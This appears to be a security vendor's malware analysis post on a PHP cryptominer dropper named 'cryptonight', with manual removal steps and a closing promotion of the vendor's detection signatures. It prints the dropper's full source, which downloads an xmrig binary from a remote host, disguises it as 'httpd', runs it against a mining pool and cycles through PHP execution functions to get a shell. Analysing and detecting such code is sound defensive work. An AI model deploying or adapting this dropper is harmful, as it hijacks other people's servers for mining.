Malware details

Cryptonight

by

This again new malware which we call cryptonight, what we haven’t seen before. It’s downloads executable Linux program and hides that http daemon in background, which is difficult find process list at first glance.

Manual remove process

You can search if there running process httpd, which start cryptonight parameter:

ps aux | grep cryptonight

Then just kill -9 process_id with root permissions.

cryptonight downloader source code

$command = "wget http://google-statik.pw/mainer/xmrig -O httpd ; chmod +x ./httpd ; ./httpd -a cryptonight -o 178.32.145.31:8005 -u 46uBZeVWU6jf7eEdSDxMb9ctVuBXBwXRu1AiTZt3AMbaJF5yrzuKnhxGbuPN6BfgUnYeQpqeRfMWnKH5orTdR8sk4pm2Jbo." . rand() . " -p x -k 2>&1 &";

if (strpos(system('echo 31313313125577') , '25577') > 0)
	{
	function execCommand($arg)
		{
		return system($arg);
		}
	}
elseif (strpos(passthru('echo 31313313125577') , '25577') > 0)
	{
	function execCommand($arg)
		{
		return passthru($arg);
		}
	}
elseif (strpos(shell_exec('echo 31313313125577') , '25577') > 0)
	{
	function execCommand($arg)
		{
		return shell_exec($arg);
		}
	}
elseif (strpos(exec('echo 31313313125577') , '25577') > 0)
	{
	function execCommand($arg)
		{
		return exec($arg);
		}
	}
elseif (function_exists('python_eval'))
	{
	function execCommand($arg)
		{
		return python_eval('import os; os.system(' . $arg . ');');
		}
	}
elseif (class_exists('Perl'))
	{
	function execCommand($arg)
		{
		$perl = new Perl();
		$r = $perl->system($arg);
		print ($r);
		}
	}
  else
	{
	try
		{
		function execCommand($arg)
			{
			$p = @pcntl_fork();
			if (!$p)
				{
				@pcntl_exec("/bin/sh", Array("-c",$arg));
				}
			  else
				{
				@pcntl_waitpid($p, $status);
				}
			}

		execCommand('echo 31313313125577');
		}

	catch(Exception $e)
		{
		print_r($e);
		try
			{
			function execCommand($arg)
				{
				$p = array(
					array('pipe','r') ,
					array('pipe','w') ,
					array('pipe','w')
				);
				$h = @proc_open($arg, $p, $pipes);
				if ($h && $pipes)
					{
					echo (fread($pipes[1], 4096));
					echo (fread($pipes[2], 4096));
					fclose($pipes[0]);
					fclose($pipes[1]);
					fclose($pipes[2]);
					proc_close($h);
					}
				}

			execCommand('echo 31313313125577');
			}

		catch(Exception $e2)
			{
			print_r($e2);
			try
				{
				function execCommand($arg)
					{
					$h = @Popen('echo 31313313125577', 'r');
					if ($h)
						{
						echo (fread($h, 4096));
						}

					execCommand('echo 31313313125577');
					}
				}

			catch(Exception $e3)
				{
				print_r($e3);
				}
			}
		}
	}

if (strpos(execCommand("ps aux 2>&1 &") , 'cryptonight') > 0)
	{
	echo 'already started';
	}
  else
	{
	echo execCommand($command);
	}

Final words

Use Malware Expert – Signatures detect this malware from files for FREE!

Websites that using Malware Expert – ModSecurity rules are protected against this kind attacks.